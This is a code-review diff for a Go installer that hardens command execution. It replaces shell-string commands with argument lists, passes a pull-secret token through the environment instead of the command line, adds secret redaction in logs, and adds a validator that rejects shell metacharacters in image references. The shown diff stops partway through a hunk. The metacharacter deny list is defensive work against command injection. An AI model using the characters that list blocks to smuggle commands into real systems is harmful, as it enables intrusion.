### PR TITLE
MGMT-24885: Harden command construction and credential handling

### DIFF
--- a/src/ops/execute/execute.go
+++ b/src/ops/execute/execute.go
@@ -7,6 +7,7 @@ import (
 	"io"
 	"os"
 	"os/exec"
+	"slices"
 	"strings"
 	"syscall"
 
@@ -17,7 +18,7 @@ import (
 //go:generate mockgen -source=execute.go -package=execute -destination=mock_execute.go
 type Execute interface {
 	ExecCommand(liveLogger io.Writer, command string, args ...string) (string, error)
-	ExecCommandWithContext(ctx context.Context, liveLogger io.Writer, command string, args ...string) (string, error)
+	ExecCommandWithOptions(liveLogger io.Writer, command string, args []string, opts ...CommandOption) (string, error)
 	Execute(command string, args ...string) (string, error)
 }
 
@@ -25,6 +26,65 @@ type executor struct {
 	cmdEnv          []string
 	log             *logrus.Logger
 	installerConfig *config.Config
+}
+
+// commandConfig holds command configuration that options can modify before
+// exec.Cmd is created. This ensures options never see or mutate the executor.
+type commandConfig struct {
+	command string
+	args    []string
+	env     []string
+	dir     string
+	ctx     context.Context
+}
+
+// CommandOption is a functional option for configuring command execution
+type CommandOption func(*commandConfig)
+
+// WithEnv adds environment variables to the command
+func WithEnv(env []string) CommandOption {
+	return func(c *commandConfig) {
+		c.env = append(c.env, env...)
+	}
+}
+
+// WithDir sets the working directory for the command
+func WithDir(dir string) CommandOption {
+	return func(c *commandConfig) {
+		c.dir = dir
+	}
+}
+
+// WithContext sets a context for the command, enabling cancellation and timeouts.
+func WithContext(ctx context.Context) CommandOption {
+	return func(c *commandConfig) {
+		c.ctx = ctx
+	}
+}
+
+// WithPrivilege wraps the command in nsenter to execute it in the host
+// environment rather than inside the container.
+func WithPrivilege() CommandOption {
+	return func(c *commandConfig) {
+		c.args = append([]string{
+			"--target", "1",
+			// Entering the cgroup namespace is not required for podman on CoreOS (where the
+			// agent typically runs), but it's needed on some Fedora versions and
+			// some other systemd based systems. Those systems are used to run dry-mode
+			// agents for load testing. If this flag is not used, Podman will sometimes
+			// have trouble creating a systemd cgroup slice for new containers.
+			"--cgroup",
+			// The mount namespace is required for podman to access the host's container
+			// storage
+			"--mount",
+			// TODO: Document why we need the IPC namespace
+			"--ipc",
+			"--pid",
+			"--",
+			c.command,
+		}, c.args...)
+		c.command = "nsenter"
+	}
 }
 
 func NewExecutor(installerConfig *config.Config, logger *logrus.Logger, proxySet bool) Execute {
@@ -53,7 +113,7 @@ func (e *executor) execCommand(liveLogger io.Writer, cmd *exec.Cmd) (string, err
 		cmd.Stdout = &stdoutBuf
 		cmd.Stderr = &stdoutBuf
 	}
-	cmd.Env = e.cmdEnv
+	cmd.Env = slices.Concat(e.cmdEnv, cmd.Env)
 	err := cmd.Run()
 	output := strings.TrimSpace(stdoutBuf.String())
 	if err != nil {
@@ -66,12 +126,11 @@ func (e *executor) execCommand(liveLogger io.Writer, cmd *exec.Cmd) (string, err
 		}
 
 		execErr := &ExecCommandError{
-			Command:         cmd.Path,
-			Args:            cmd.Args[1:],
-			Env:             cmd.Env,
-			ExitErr:         err,
-			Output:          output,
-			PullSecretToken: e.installerConfig.PullSecretToken,
+			Command: cmd.Path,
+			Args:    cmd.Args[1:],
+			Env:     cmd.Env,
+			ExitErr: err,
+			Output:  output,
 		}
 		if exitErr, ok := err.(*exec.ExitError); ok {
 			if status, ok := exitErr.Sys().(syscall.WaitStatus); ok {
@@ -84,8 +143,8 @@ func (e *executor) execCommand(liveLogger io.Writer, cmd *exec.Cmd) (string, err
 		}
 		return output, execErr
 	}
-	e.log.Debug("Command executed:", " command", cmd.Path, " arguments", removePullSecret(cmd.Args[1:], e.installerConfig.PullSecretToken), "env vars",
-		removePullSecret(cmd.Env, e.installerConfig.PullSecretToken), "output", output)
+	e.log.Debug("Command executed:", " command", cmd.Path, " arguments", cmd.Args[1:], "env vars",
+		redactSensitiveEnv(cmd.Env), "output", output)
 	return output, err
 }
 
@@ -93,18 +152,31 @@ func (e *executor) ExecCommand(liveLogger io.Writer, command string, args ...str
 	return e.execCommand(liveLogger, exec.Command(command, args...))
 }
 
-func (e *executor) ExecCommandWithContext(ctx context.Context, liveLogger io.Writer, command string, args ...string) (string, error) {
-	return e.execCommand(liveLogger, exec.CommandContext(ctx, command, args...))
+func (e *executor) ExecCommandWithOptions(liveLogger io.Writer, command string, args []string, opts ...CommandOption) (string, error) {
+	cfg := &commandConfig{command: command, args: args}
+	for _, opt := range opts {
+		opt(cfg)
+	}
+	cmd := newCmd(cfg.ctx, cfg.command, cfg.args...)
+	cmd.Env = append(cmd.Env, cfg.env...)
+	cmd.Dir = cfg.dir
+	return e.execCommand(liveLogger, cmd)
+}
+
+func newCmd(ctx context.Context, command string, args ...string) *exec.Cmd {
+	if ctx != nil {
+		return exec.CommandContext(ctx, command, args...)
+	}
+	return exec.Command(command, args...)
 }
 
 type ExecCommandError struct {
-	Command         string
-	Args            []string
-	Env             []string
-	ExitErr         error
-	Output          string
-	WaitStatus      int
-	PullSecretToken string
+	Command    string
+	Args       []string
+	Env        []string
+	ExitErr    error
+	Output     string
+	WaitStatus int
 }
 
 func (e *ExecCommandError) Error() string {
@@ -112,45 +184,48 @@ func (e *ExecCommandError) Error() string {
 	if len(e.Output) > 200 {
 		lastOutput = "... " + e.Output[len(e.Output)-200:]
 	}
-	return fmt.Sprintf("failed executing %s %v, Error %s, LastOutput \"%s\"", e.Command, removePullSecret(e.Args, e.PullSecretToken), e.ExitErr, lastOutput)
+	return fmt.Sprintf("failed executing %s %v, Error %s, LastOutput \"%s\"", e.Command, e.Args, e.ExitErr, lastOutput)
 }
 
 func (e *ExecCommandError) DetailedError() string {
-	return fmt.Sprintf("failed executing %s %v, env vars %v, error %s, waitStatus %d, Output \"%s\"", e.Command, removePullSecret(e.Args, e.PullSecretToken), removePullSecret(e.Env, e.PullSecretToken), e.ExitErr, e.WaitStatus, e.Output)
+	return fmt.Sprintf("failed executing %s %v, env vars %v, error %s, waitStatus %d, Output \"%s\"", e.Command, e.Args, redactSensitiveEnv(e.Env), e.ExitErr, e.WaitStatus, e.Output)
 }
 
-func removePullSecret(s []string, pullSecretToken string) []string {
-	if pullSecretToken == "" {
-		return s
+// redactSensitiveEnv redacts environment variables that contain secrets
+func redactSensitiveEnv(env []string) []string {
+	if len(env) == 0 {
+		return env
 	}
 
-	return strings.Split(strings.ReplaceAll(strings.Join(s, " "), pullSecretToken, "<SECRET>"), " ")
+	sensitivePatterns := []string{
+		"TOKEN", "KEY", "SECRET", "PASSWORD", "PASS", "PWD",
+		"AUTH", "CREDENTIAL", "CRED", "CERT", "PRIVATE",
+	}
+
+	redacted := make([]string, len(env))
+	for i, e := range env {
+		if idx := strings.Index(e, "="); idx > 0 {
+			name := strings.ToUpper(e[:idx])
+			isSensitive := false
+			for _, pattern := range sensitivePatterns {
+				if strings.Contains(name, pattern) {
+					isSensitive = true
+					break
+				}
+			}
+			if isSensitive {
+				redacted[i] = e[:idx] + "=<REDACTED>"
+			} else {
+				redacted[i] = e
+			}
+		} else {
+			redacted[i] = e
+		}
+	}
+	return redacted
 }
 
 // Execute execute a command in the host environment via nsenter
 func (e *executor) Execute(command string, args ...string) (string, error) {
-	// nsenter is used here to launch processes inside the container in a way that makes said processes feel
-	// and behave as if they're running on the host directly rather than inside the container
-	commandBase := "nsenter"
-
-	arguments := []string{
-		"--target", "1",
-		// Entering the cgroup namespace is not required for podman on CoreOS (where the
-		// agent typically runs), but it's needed on some Fedora versions and
-		// some other systemd based systems. Those systems are used to run dry-mode
-		// agents for load testing. If this flag is not used, Podman will sometimes
-		// have trouble creating a systemd cgroup slice for new containers.
-		"--cgroup",
-		// The mount namespace is required for podman to access the host's container
-		// storage
-		"--mount",
-		// TODO: Document why we need the IPC namespace
-		"--ipc",
-		"--pid",
-		"--",
-		command,
-	}
-
-	arguments = append(arguments, args...)
-	return e.ExecCommand(e.log.Writer(), commandBase, arguments...)
+	return e.ExecCommandWithOptions(e.log.Writer(), command, args, WithPrivilege())
 }

--- a/src/ops/execute/execute_suite_test.go
+++ b/src/ops/execute/execute_suite_test.go
@@ -1,0 +1,13 @@
+package execute
+
+import (
+	"testing"
+
+	. "github.com/onsi/ginkgo"
+	. "github.com/onsi/gomega"
+)
+
+func TestExecute(t *testing.T) {
+	RegisterFailHandler(Fail)
+	RunSpecs(t, "execute_test")
+}

--- a/src/ops/execute/execute_test.go
+++ b/src/ops/execute/execute_test.go
@@ -5,19 +5,18 @@ import (
 
 	. "github.com/onsi/ginkgo"
 	. "github.com/onsi/gomega"
+	"github.com/openshift/assisted-installer/src/config"
+	"github.com/sirupsen/logrus"
 )
 
 var _ = Describe("ExecCommandError", func() {
-	pullSecret := "TEST-TOKEN"
-
 	It("Creates the correct error for mkdir", func() {
 		err := &ExecCommandError{
-			Command:         "mkdir",
-			Args:            []string{"-p", "/somedir"},
-			Env:             []string{"HOME=/home/userZ"},
-			ExitErr:         fmt.Errorf("Permission denied"),
-			Output:          "mkdir: cannot create directory ‘/somedir’: Permission denied",
-			PullSecretToken: pullSecret,
+			Command: "mkdir",
+			Args:    []string{"-p", "/somedir"},
+			Env:     []string{"HOME=/home/userZ"},
+			ExitErr: fmt.Errorf("Permission denied"),
+			Output:  "mkdir: cannot create directory ‘/somedir’: Permission denied",
 		}
 		wantError := "failed executing mkdir [-p /somedir], Error Permission denied, LastOutput \"mkdir: cannot create directory ‘/somedir’: Permission denied\""
 		wantDetailedError := "failed executing mkdir [-p /somedir], env vars [HOME=/home/userZ], error Permission denied, waitStatus 0, Output \"mkdir: cannot create directory ‘/somedir’: Permission denied\""
@@ -28,17 +27,16 @@ var _ = Describe("ExecCommandError", func() {
 
 	It("Creates the correct error for ignition extract", func() {
 		err := &ExecCommandError{
-			Command:         "nsenter",
-			Args:            []string{"-t", "1", "-m", "-i", "--", "podman", "run", "--net", "host", "--volume", "/:/rootfs:rw", "--volume", "/usr/bin/rpm-ostree:/usr/bin/rpm-ostree", "--privileged", "--entrypoint", "/usr/bin/machine-config-daemon", "quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221", "start", "--node-name", "localhost", "--root-mount", "/rootfs", "--once-from", "/opt/install-dir/bootstrap.ign", "--skip-reboot", "--pull-secret", pullSecret},
-			Env:             []string{"HOME=/home/userZ", fmt.Sprintf("PULL_SECRET_TOKEN=%s", pullSecret)},
-			ExitErr:         fmt.Errorf("exit status 255"),
-			WaitStatus:      255,
-			Output:          "Trying to pull quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221...\nGetting image source signatures\nCopying blob sha256:74cbb6607642df5f9f70e8588e3c56d6de795d1a9af22866ea4cc82f2dad4f14\nCopying blob sha256:c9fa7d57b9028d4bd02b51cef3c3039fa7b23a8b2d9d26a6ce66b3428f6e2457\nCopying blob sha256:c676df4ac84e718ecee4f8129e43e9c2b7492942606cc65f1fc5e6f3da413160\nCopying blob sha256:b147db91a07555d29ed6085e4733f34dbaa673076488caa8f95f4677f55b3a5c\nCopying blob sha256:ad956945835b7630565fc23fcbd8194eef32b4300c28546d574b2a377fe5d0a5\nCopying config sha256:c4356549f53a30a1baefc5d1515ec1ab8b3786a4bf1738c0abaedc0e44829498\nWriting manifest to image destination\nStoring signatures\nI1019 19:03:28.797092 1 start.go:108] Version: v4.6.0-202008262209.p0-dirty (16d243c4bed178f5d4fd400c0518ebf1dbaface8)\nI1019 19:03:28.797227 1 start.go:118] Calling chroot(\"/rootfs\")\nI1019 19:03:28.797307 1 rpm-ostree.go:261] Running captured: rpm-ostree status --json\nerror: Timeout was reached\nF1019 19:04:35.869592 1 start.go:147] Failed to initialize single run daemon: error reading osImageURL from rpm-ostree: error running rpm-ostree status --json: : exit status 1)",
-			PullSecretToken: pullSecret,
+			Command:    "nsenter",
+			Args:       []string{"-t", "1", "-m", "-i", "--", "podman", "run", "--net", "host", "--volume", "/:/rootfs:rw", "--volume", "/usr/bin/rpm-ostree:/usr/bin/rpm-ostree", "--privileged", "--entrypoint", "/usr/bin/machine-config-daemon", "quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221", "start", "--node-name", "localhost", "--root-mount", "/rootfs", "--once-from", "/opt/install-dir/bootstrap.ign", "--skip-reboot"},
+			Env:        []string{"HOME=/home/userZ", "PULL_SECRET_TOKEN=TEST-TOKEN"},
+			ExitErr:    fmt.Errorf("exit status 255"),
+			WaitStatus: 255,
+			Output:     "Trying to pull quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221...\nGetting image source signatures\nCopying blob sha256:74cbb6607642df5f9f70e8588e3c56d6de795d1a9af22866ea4cc82f2dad4f14\nCopying blob sha256:c9fa7d57b9028d4bd02b51cef3c3039fa7b23a8b2d9d26a6ce66b3428f6e2457\nCopying blob sha256:c676df4ac84e718ecee4f8129e43e9c2b7492942606cc65f1fc5e6f3da413160\nCopying blob sha256:b147db91a07555d29ed6085e4733f34dbaa673076488caa8f95f4677f55b3a5c\nCopying blob sha256:ad956945835b7630565fc23fcbd8194eef32b4300c28546d574b2a377fe5d0a5\nCopying config sha256:c4356549f53a30a1baefc5d1515ec1ab8b3786a4bf1738c0abaedc0e44829498\nWriting manifest to image destination\nStoring signatures\nI1019 19:03:28.797092 1 start.go:108] Version: v4.6.0-202008262209.p0-dirty (16d243c4bed178f5d4fd400c0518ebf1dbaface8)\nI1019 19:03:28.797227 1 start.go:118] Calling chroot(\"/rootfs\")\nI1019 19:03:28.797307 1 rpm-ostree.go:261] Running captured: rpm-ostree status --json\nerror: Timeout was reached\nF1019 19:04:35.869592 1 start.go:147] Failed to initialize single run daemon: error reading osImageURL from rpm-ostree: error running rpm-ostree status --json: : exit status 1)",
 		}
-		wantError := `failed executing nsenter [-t 1 -m -i -- podman run --net host --volume /:/rootfs:rw --volume /usr/bin/rpm-ostree:/usr/bin/rpm-ostree --privileged --entrypoint /usr/bin/machine-config-daemon quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221 start --node-name localhost --root-mount /rootfs --once-from /opt/install-dir/bootstrap.ign --skip-reboot --pull-secret <SECRET>], Error exit status 255, LastOutput "... or: Timeout was reached
+		wantError := `failed executing nsenter [-t 1 -m -i -- podman run --net host --volume /:/rootfs:rw --volume /usr/bin/rpm-ostree:/usr/bin/rpm-ostree --privileged --entrypoint /usr/bin/machine-config-daemon quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221 start --node-name localhost --root-mount /rootfs --once-from /opt/install-dir/bootstrap.ign --skip-reboot], Error exit status 255, LastOutput "... or: Timeout was reached
 F1019 19:04:35.869592 1 start.go:147] Failed to initialize single run daemon: error reading osImageURL from rpm-ostree: error running rpm-ostree status --json: : exit status 1)"`
-		wantDetailedError := `failed executing nsenter [-t 1 -m -i -- podman run --net host --volume /:/rootfs:rw --volume /usr/bin/rpm-ostree:/usr/bin/rpm-ostree --privileged --entrypoint /usr/bin/machine-config-daemon quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221 start --node-name localhost --root-mount /rootfs --once-from /opt/install-dir/bootstrap.ign --skip-reboot --pull-secret <SECRET>], env vars [HOME=/home/userZ PULL_SECRET_TOKEN=<SECRET>], error exit status 255, waitStatus 255, Output "Trying to pull quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221...
+		wantDetailedError := `failed executing nsenter [-t 1 -m -i -- podman run --net host --volume /:/rootfs:rw --volume /usr/bin/rpm-ostree:/usr/bin/rpm-ostree --privileged --entrypoint /usr/bin/machine-config-daemon quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221 start --node-name localhost --root-mount /rootfs --once-from /opt/install-dir/bootstrap.ign --skip-reboot], env vars [HOME=/home/userZ PULL_SECRET_TOKEN=<REDACTED>], error exit status 255, waitStatus 255, Output "Trying to pull quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:dc1a34f55c712b2b9c5e5a14dd85e67cbdae11fd147046ac2fef9eaf179ab221...
 Getting image source signatures
 Copying blob sha256:74cbb6607642df5f9f70e8588e3c56d6de795d1a9af22866ea4cc82f2dad4f14
 Copying blob sha256:c9fa7d57b9028d4bd02b51cef3c3039fa7b23a8b2d9d26a6ce66b3428f6e2457
@@ -56,5 +54,91 @@ F1019 19:04:35.869592 1 start.go:147] Failed to initialize single run daemon: er
 
 		Expect(err.Error()).To(Equal(wantError))
 		Expect(err.DetailedError()).To(Equal(wantDetailedError))
+	})
+})
+
+var _ = Describe("ExecCommandWithOptions", func() {
+	It("should combine base environment with additional env from WithEnv", func() {
+		executor := NewExecutor(&config.Config{}, logrus.New(), false).(*executor)
+
+		additionalEnv := []string{"TEST_VAR=test_value", "PULL_SECRET_TOKEN=secret"}
+		cfg := &commandConfig{command: "sh", args: []string{"-c", "env"}}
+
+		WithEnv(additionalEnv)(cfg)
+		Expect(cfg.env).To(Equal(additionalEnv), "WithEnv should append additional env")
+
+		// Simulate what execCommand does - prepend base env
+		finalEnv := append(append([]string(nil), executor.cmdEnv...), cfg.env...)
+
+		Expect(finalEnv).To(ContainElement("TEST_VAR=test_value"),
+			"Final env should contain additional vars")
+		Expect(finalEnv).To(ContainElement("PULL_SECRET_TOKEN=secret"),
+			"Final env should contain secret token")
+		Expect(len(finalEnv)).To(Equal(len(executor.cmdEnv)+len(additionalEnv)),
+			"Final env should have base + additional vars")
+	})
+
+	It("should support multiple WithEnv calls", func() {
+		cfg := &commandConfig{command: "sh", args: []string{"-c", "env"}}
+
+		WithEnv([]string{"VAR1=value1"})(cfg)
+		WithEnv([]string{"VAR2=value2"})(cfg)
+
+		Expect(cfg.env).To(Equal([]string{"VAR1=value1", "VAR2=value2"}),
+			"Multiple WithEnv calls should compose")
+	})
+
+	It("should redact sensitive environment variables from logs", func() {
+		testEnv := []string{
+			"PULL_SECRET_TOKEN=secret123",
+			"API_KEY=apikey456",
+			"DATABASE_PASSWORD=dbpass789",
+			"HOME=/home/user",
+			"PATH=/usr/bin",
+		}
+
+		redacted := redactSensitiveEnv(testEnv)
+
+		Expect(redacted).To(ContainElement("PULL_SECRET_TOKEN=<REDACTED>"),
+			"TOKEN should be redacted")
+		Expect(redacted).To(ContainElement("API_KEY=<REDACTED>"),
+			"KEY should be redacted")
+		Expect(redacted).To(ContainElement("DATABASE_PASSWORD=<REDACTED>"),
+			"PASSWORD should be redacted")
+		Expect(redacted).To(ContainElement("HOME=/home/user"),
+			"Non-sensitive vars should not be redacted")
+		Expect(redacted).To(ContainElement("PATH=/usr/bin"),
+			"Non-sensitive vars should not be redacted")
+
+		Expect(redacted).ToNot(ContainElement(ContainSubstring("secret123")),
+			"Secret values should not appear in redacted output")
+		Expect(redacted).ToNot(ContainElement(ContainSubstring("apikey456")),
+			"Secret values should not appear in redacted output")
+		Expect(redacted).ToNot(ContainElement(ContainSubstring("dbpass789")),
+			"Secret values should not appear in redacted output")
+	})
+
+	It("should wrap command in nsenter with WithPrivilege", func() {
+		cfg := &commandConfig{command: "podman", args: []string{"run", "--rm", "image"}}
+
+		WithPrivilege()(cfg)
+
+		Expect(cfg.command).To(Equal("nsenter"))
+		Expect(cfg.args).To(Equal([]string{
+			"--target", "1",
+			"--cgroup", "--mount", "--ipc", "--pid",
+			"--",
+			"podman", "run", "--rm", "image",
+		}))
+	})
+
+	It("should compose WithPrivilege and WithEnv", func() {
+		cfg := &commandConfig{command: "podman", args: []string{"run", "image"}}
+
+		WithPrivilege()(cfg)
+		WithEnv([]string{"TOKEN=secret"})(cfg)
+
+		Expect(cfg.command).To(Equal("nsenter"))
+		Expect(cfg.env).To(Equal([]string{"TOKEN=secret"}))
 	})
 })

--- a/src/ops/execute/mock_execute.go
+++ b/src/ops/execute/mock_execute.go
@@ -10,7 +10,6 @@
 package execute
 
 import (
-	context "context"
 	io "io"
 	reflect "reflect"
 
@@ -60,24 +59,24 @@ func (mr *MockExecuteMockRecorder) ExecCommand(liveLogger, command any, args ...
 	return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ExecCommand", reflect.TypeOf((*MockExecute)(nil).ExecCommand), varargs...)
 }
 
-// ExecCommandWithContext mocks base method.
-func (m *MockExecute) ExecCommandWithContext(ctx context.Context, liveLogger io.Writer, command string, args ...string) (string, error) {
+// ExecCommandWithOptions mocks base method.
+func (m *MockExecute) ExecCommandWithOptions(liveLogger io.Writer, command string, args []string, opts ...CommandOption) (string, error) {
 	m.ctrl.T.Helper()
-	varargs := []any{ctx, liveLogger, command}
-	for _, a := range args {
+	varargs := []any{liveLogger, command, args}
+	for _, a := range opts {
 		varargs = append(varargs, a)
 	}
-	ret := m.ctrl.Call(m, "ExecCommandWithContext", varargs...)
+	ret := m.ctrl.Call(m, "ExecCommandWithOptions", varargs...)
 	ret0, _ := ret[0].(string)
 	ret1, _ := ret[1].(error)
 	return ret0, ret1
 }
 
-// ExecCommandWithContext indicates an expected call of ExecCommandWithContext.
-func (mr *MockExecuteMockRecorder) ExecCommandWithContext(ctx, liveLogger, command any, args ...any) *gomock.Call {
+// ExecCommandWithOptions indicates an expected call of ExecCommandWithOptions.
+func (mr *MockExecuteMockRecorder) ExecCommandWithOptions(liveLogger, command, args any, opts ...any) *gomock.Call {
 	mr.mock.ctrl.T.Helper()
-	varargs := append([]any{ctx, liveLogger, command}, args...)
-	return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ExecCommandWithContext", reflect.TypeOf((*MockExecute)(nil).ExecCommandWithContext), varargs...)
+	varargs := append([]any{liveLogger, command, args}, opts...)
+	return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ExecCommandWithOptions", reflect.TypeOf((*MockExecute)(nil).ExecCommandWithOptions), varargs...)
 }
 
 // Execute mocks base method.

--- a/src/ops/ops.go
+++ b/src/ops/ops.go
@@ -22,6 +22,7 @@ import (
 	"strings"
 	"text/template"
 	"time"
+	"unicode"
 
 	config_latest "github.com/coreos/ignition/v2/config/v3_2"
 	"github.com/go-openapi/swag"
@@ -47,6 +48,9 @@ const (
 	registryDataDirOnMnt            = "/mnt/agentdata"
 	ostreeDeployPath                = "/mnt/root/ostree/deploy/rhcos"
 )
+
+// Supports: registry.io/repo:tag, registry.io:port/repo:tag, repo@sha256:digest, repo:tag@sha256:digest
+var imageReferencePattern = regexp.MustCompile(`^[a-zA-Z0-9._-]+(:[0-9]+)?(/[a-zA-Z0-9._/-]+)?(:[a-zA-Z0-9._-]+)?(@sha256:[a-fA-F0-9]{64})?$`)
 
 //go:generate mockgen -source=ops.go -package=ops -destination=mock_ops.go
 type Ops interface {
@@ -640,10 +644,9 @@ func (o *ops) GetMCSLogs() (string, error) {
 	return string(logs), nil
 }
 
-// This function actually runs container that imeplements logs_sender command
-// Any change to the assisted-service API that is used by the logs_sender command
-// ( for example UploadLogs), must be reflected here (input parameters, etc'),
-// if needed
+// This function runs a container that implements the logs_sender command.
+// Any change to the assisted-service API used by logs_sender (e.g. UploadLogs)
+// must be reflected here (input parameters, etc.)
 func (o *ops) UploadInstallationLogs(isBootstrap bool) (string, error) {
 	command := "podman"
 
@@ -655,17 +658,21 @@ func (o *ops) UploadInstallationLogs(isBootstrap bool) (string, error) {
 		args = append(args, "-v", fmt.Sprintf("%[1]s:%[1]s", o.installerConfig.CACertPath))
 	}
 
+	args = append(args, "--env", "PULL_SECRET_TOKEN")
+
 	args = append(args, o.installerConfig.AgentImage, "logs_sender",
 		"-cluster-id", o.installerConfig.ClusterID, "-url", o.installerConfig.URL,
 		"-host-id", o.installerConfig.HostID, "-infra-env-id", o.installerConfig.InfraEnvID,
-		"-pull-secret-token", o.installerConfig.PullSecretToken,
 		fmt.Sprintf("-insecure=%s", strconv.FormatBool(o.installerConfig.SkipCertVerification)),
 		fmt.Sprintf("-bootstrap=%s", strconv.FormatBool(isBootstrap)))
 
 	if o.installerConfig.CACertPath != "" {
 		args = append(args, fmt.Sprintf("-cacert=%s", o.installerConfig.CACertPath))
 	}
-	return o.ExecPrivilegeCommand(o.logWriter, command, args...)
+
+	// Pass token via command-specific environment to avoid exposure in /proc/PID/cmdline
+	env := []string{fmt.Sprintf("PULL_SECRET_TOKEN=%s", o.installerConfig.PullSecretToken)}
+	return o.executor.ExecCommandWithOptions(o.logWriter, command, args, execute.WithPrivilege(), execute.WithEnv(env))
 }
 
 // Sometimes we will need to reload container files from host
@@ -727,16 +734,19 @@ func (o *ops) CreateOpenshiftSshManifest(filePath, tmpl, sshPubKeyPath string) e
 }
 
 func (o *ops) GetNumberOfReboots(ctx context.Context, nodeName, kubeconfigPath string) (int, error) {
-	out, err := o.executor.ExecCommandWithContext(ctx, o.logWriter, "oc",
-		"--kubeconfig",
-		kubeconfigPath,
-		"debug",
-		fmt.Sprintf("node/%s", nodeName),
-		"--",
-		"chroot",
-		"/host",
-		"last",
-		"reboot")
+	out, err := o.executor.ExecCommandWithOptions(o.logWriter, "oc",
+		[]string{
+			"--kubeconfig",
+			kubeconfigPath,
+			"debug",
+			fmt.Sprintf("node/%s", nodeName),
+			"--",
+			"chroot",
+			"/host",
+			"last",
+			"reboot",
+		},
+		execute.WithContext(ctx))
 	if err != nil {
 		return 0, err
 	}
@@ -750,15 +760,42 @@ func (o *ops) GetNumberOfReboots(ctx context.Context, nodeName, kubeconfigPath s
 	return numReboots, nil
 }
 
-func (o *ops) GetMustGatherLogs(workDir, kubeconfigPath string, images ...string) (string, error) {
-	//invoke oc adm must-gather command in the working directory
-	var imageOption string = ""
-	for _, img := range images {
-		imageOption = imageOption + fmt.Sprintf(" --image=%s", img)
+// validateImageReference validates image format and rejects shell metacharacters
+func validateImageReference(image string) error {
+	if image == "" {
+		return errors.New("image reference cannot be empty")
 	}
 
-	command := fmt.Sprintf("cd %s && oc --kubeconfig=%s adm must-gather%s", workDir, kubeconfigPath, imageOption)
-	output, err := o.executor.ExecCommand(o.logWriter, "bash", "-c", command)
+	dangerousChars := ";|&$`<>(){}[]'\"\\!\n\r\t"
+	for _, char := range dangerousChars {
+		if strings.ContainsRune(image, char) {
+			return errors.Errorf("image reference contains invalid character: %c", char)
+		}
+	}
+
+	for _, r := range image {
+		if unicode.IsControl(r) {
+			return errors.Errorf("image reference contains control character")
+		}
+	}
+
+	if !imageReferencePattern.MatchString(image) {
+		return errors.Errorf("image reference has invalid format")
+	}
+
+	return nil
+}
+
+func (o *ops) GetMustGatherLogs(workDir, kubeconfigPath string, images ...string) (string, error) {
+	args := []string{"--kubeconfig=" + kubeconfigPath, "adm", "must-gather"}
+	for _, img := range images {
+		if err := validateImageReference(img); err != nil {
+			return "", errors.Wrapf(err, "invalid must-gather image reference: %s", img)
+		}
+		args = append(args, "--image="+img)
+	}
+
+	output, err := o.executor.ExecCommandWithOptions(o.logWriter, "oc", args, execute.WithDir(workDir))
 	if err != nil {
 		return "", err
 	}
@@ -779,20 +816,19 @@ func (o *ops) GetMustGatherLogs(workDir, kubeconfigPath string, images ...string
 	}
 	logsDir := filepath.Base(files[0])
 
-	//tar the log directory and return the path to the tarball
-	command = fmt.Sprintf("cd %s && tar zcf %s %s", workDir, MustGatherFileName, logsDir)
-	_, err = o.executor.ExecCommand(o.logWriter, "bash", "-c", command)
+	tarPath := path.Join(workDir, MustGatherFileName)
+	tarArgs := []string{"-czf", tarPath, "-C", workDir, logsDir}
+	_, err = o.executor.ExecCommand(o.logWriter, "tar", tarArgs...)
 	if err != nil {
 		o.log.WithError(err).Errorf("Failed to tar must-gather logs\n")
 		return "", err
 	}
-	return path.Join(workDir, MustGatherFileName), nil
+	return tarPath, nil
 }
 
 func (o *ops) CreateRandomHostname(hostname string) error {
-	command := fmt.Sprintf("hostnamectl set-hostname %s", hostname)
-	o.log.Infof("applying random hostname with command %s", command)
-	_, err := o.ExecPrivilegeCommand(o.logWriter, "bash", "-c", command)
+	o.log.Infof("Setting hostname to %s", hostname)
+	_, err := o.ExecPrivilegeCommand(o.logWriter, "hostnamectl", "set-hostname", hostname)
 	return err
 }
 
@@ -815,8 +851,7 @@ func (o *ops) CreateManifests(kubeconfig string, content []byte) error {
 	}
 
 	// Run oc command that creates the custom manifest:
-	command := fmt.Sprintf("oc --kubeconfig=%s apply -f %s", kubeconfig, file.Name())
-	output, err := o.executor.ExecCommand(o.logWriter, "bash", "-c", command)
+	output, err := o.executor.ExecCommand(o.logWriter, "oc", "--kubeconfig="+kubeconfig, "apply", "-f", file.Name())
 	if err != nil {
 		return err
 	}
@@ -841,30 +876,7 @@ func (o *ops) FileExists(path string) bool {
 
 // ExecPrivilegeCommand execute a command in the host environment via nsenter
 func (o *ops) ExecPrivilegeCommand(liveLogger io.Writer, command string, args ...string) (string, error) {
-	// nsenter is used here to launch processes inside the container in a way that makes said processes feel
-	// and behave as if they're running on the host directly rather than inside the container
-	commandBase := "nsenter"
-
-	arguments := []string{
-		"--target", "1",
-		// Entering the cgroup namespace is not required for podman on CoreOS (where the
-		// agent typically runs), but it's needed on some Fedora versions and
-		// some other systemd based systems. Those systems are used to run dry-mode
-		// agents for load testing. If this flag is not used, Podman will sometimes
-		// have trouble creating a systemd cgroup slice for new containers.
-		"--cgroup",
